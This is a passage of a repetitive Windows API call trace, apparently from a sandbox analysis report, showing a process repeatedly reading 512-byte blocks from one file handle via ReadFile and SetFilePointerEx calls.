lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 
[0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 
lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 
[0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, 
lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 
[0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
